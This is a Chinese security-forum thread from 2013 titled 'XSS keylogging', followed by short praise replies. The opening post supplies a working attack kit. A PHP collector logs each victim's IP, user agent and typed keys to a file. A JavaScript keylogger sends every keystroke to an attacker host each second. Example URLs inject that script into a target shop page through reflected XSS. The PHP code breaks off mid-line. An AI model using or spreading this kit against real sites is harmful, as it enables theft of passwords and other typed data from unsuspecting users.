XSS的键盘记录

admin · 发表于 2013-1-28 09:49:42

转自国外安全研究论坛

这种方法是非常公开的，但很多人仍然不知道它。
cookie时，从目标不能重复使用，您可以使用此方法。你需要一台主机上传：
g.php
PHP Code:

<?php$Keylog = $_GET["c"]; $reffer = $_SERVER['HTTP_REFERER']; $ip = $_SERVER['REMOTE_ADDR']; $date=date ("l dS of F Y h:i:s A"); $port = $_SERVER['REMOTE_PORT']; $user_agent = $_SERVER['HTTP_USER_AGENT']; $file = fopen('data.txt', 'a'); fwrite($file, 'Ip: '.$ip."\n"); fwrite($file, 'Port: '.$port."\n"); fwrite($file, 'Refferer: '.$reffer."\n"); fwrite($file, 'User Agent: '.$user_agent."\n"); fwrite($file, 'Date: '.$date."\n"); fwrite($file, $Keylog."\n"); fwrite($file, "---------------------------\n\n"); fclose($fi

k.js:
PHP Code:

var keys=''; document.onkeypress = function(e) { get = window.event?event:e; key = get.keyCode?get.keyCode:get.charCode; key = String.fromCharCode(key); keys+=key; } window.setInterval(function(){ new Image().src = 'http://yourhost.com/g.php?c='+keys; keys = ''; }, 1000);

一个新的文件名为data.txt的和chmod 777 data.txt中，您可以使用它像这样：

Code:

http://monkey.com/shop.php?article=12<script src="http://yourhost.com/k.js"></script>

或
代码：

http://monkey.com/shop.php?article=12<script language="JavaScript" src="http://yourhost.com/k.js"></script>

我的好友 · 发表于 2013-1-28 19:10:50

慢慢来，呵呵

微笑里带着浅 · 发表于 2013-1-31 11:17:28

呵呵，等着就等着....

土豆哥 · 发表于 2013-2-2 04:53:18

厉害！强~~~~没的说了！

小胖子 · 发表于 2013-2-5 22:52:46

这个贴不错！！！！！看了之后就要回复贴子，呵呵

都市第三方 · 发表于 2013-2-7 11:27:43

看看..

显示全部楼层 · 发表于 2014-9-22 16:51:40

提示: 作者被禁止或删除内容自动屏蔽

老衲 · 发表于 2014-12-26 12:03:50

提示: 作者被禁止或删除内容自动屏蔽

带头大哥 · 发表于 2015-1-26 16:08:45

努力,努力,再努力!!!!!!!!!!!

凤池驹 · 发表于 2015-2-28 17:57:49

要不我崇拜你?行吗?

7299189 该用户已被删除	发表于 2014-9-22 16:51:40 \| 显示全部楼层提示: 作者被禁止或删除内容自动屏蔽
7299189 该用户已被删除
	回复支持反对使用道具举报显身卡

老衲老衲当前离线积分 259 窥视卡雷达卡	发表于 2014-12-26 12:03:50 \| 显示全部楼层提示: 作者被禁止或删除内容自动屏蔽
老衲老衲当前离线积分 259 窥视卡雷达卡
	回复支持反对使用道具举报显身卡

XSS的键盘记录

相关帖子